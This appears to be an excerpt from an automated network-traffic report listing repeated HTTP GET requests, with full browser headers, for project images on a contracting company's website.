Source: global trafficHTTP traffic detected: GET /uploads/projects/14/9c27c5ed5390bcab73619e4cc9ae7362.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/12/e14e9190beffdec276a88b4d487cd9ab.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/1/c10a34a38c54c09dea6d4e76cb363989.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/30/d32187d7377ba8b456ad17d703a1f7c9.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/21/ccbc0b3107341d28610c4ec42a1c8641.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/22/99d0794491cfd3b80cd8a673e31ef7e3.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/8/0c298f1956a31b39bf820e0dd7ec632b.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/31/4a98fa9bd66caf02803bed595073351f.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/20/712fe2efb37a4a3b2be6e91c62276b19.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/7/21d631acc2ddb0fc3dcf4f737c53f9da.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/6/f8dd4bffdef039afd52cc92797706540.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/24/edfba0a01d899e45cac743ee4b47082a.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/5/37ea8047a2494b50f7dc694b8f8dcf37.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/29/8814c125f673212d4b4567019722294a.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/23/c7a29cc2e7fdcacc9c3f5f4ff3bddd5f.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/33/278721d8625e4718b5b85a64722cc99d.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/25/9d9712f45a8ff4b4f837c7761f37a2b1.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/32/a5af5c8ac06932758cc7ca886fdabf1b.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/17/e7dd25a6640aa7bddcdaf018fbb5a7f2.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/19/f8a20d10a257c0d0108fbe993c55b0fa.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/12/99cc5d257a0d7f25b4541a6275919c83.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/15/6a0a747aec6891a7650e250b247f7939.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/10/579de64f97d717521a5fc6fcc0eaa118.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/34/2df040a4c38aa8d8468943fbef9cc703.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/27/90299ab973339b4f1441f267ea92a6d7.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/28/d42724b6981b1026789790a7700c638e.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/26/a417b2689f08829d773cb2abc660a2f4.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/16/f2e9aef4e6dba3f5ab1fba99f80ec53b.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/18/d4358b3300881d66d5be0da1f9c2ed79.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/14/9c27c5ed5390bcab73619e4cc9ae7362.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/9/da3ea8845675faf87c497231993e7480.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/13/ede6b29ab48bcd7727bef37740e56b13.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/11/dc8d49617e8c915bd5328fa315b82453.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/12/e14e9190beffdec276a88b4d487cd9ab.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/21/ccbc0b3107341d28610c4ec42a1c8641.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/30/d32187d7377ba8b456ad17d703a1f7c9.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/20/712fe2efb37a4a3b2be6e91c62276b19.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/24/edfba0a01d899e45cac743ee4b47082a.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/31/4a98fa9bd66caf02803bed595073351f.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/23/c7a29cc2e7fdcacc9c3f5f4ff3bddd5f.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/29/8814c125f673212d4b4567019722294a.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/25/9d9712f45a8ff4b4f837c7761f37a2b1.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/33/278721d8625e4718b5b85a64722cc99d.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/27/90299ab973339b4f1441f267ea92a6d7.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/32/a5af5c8ac06932758cc7ca886fdabf1b.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
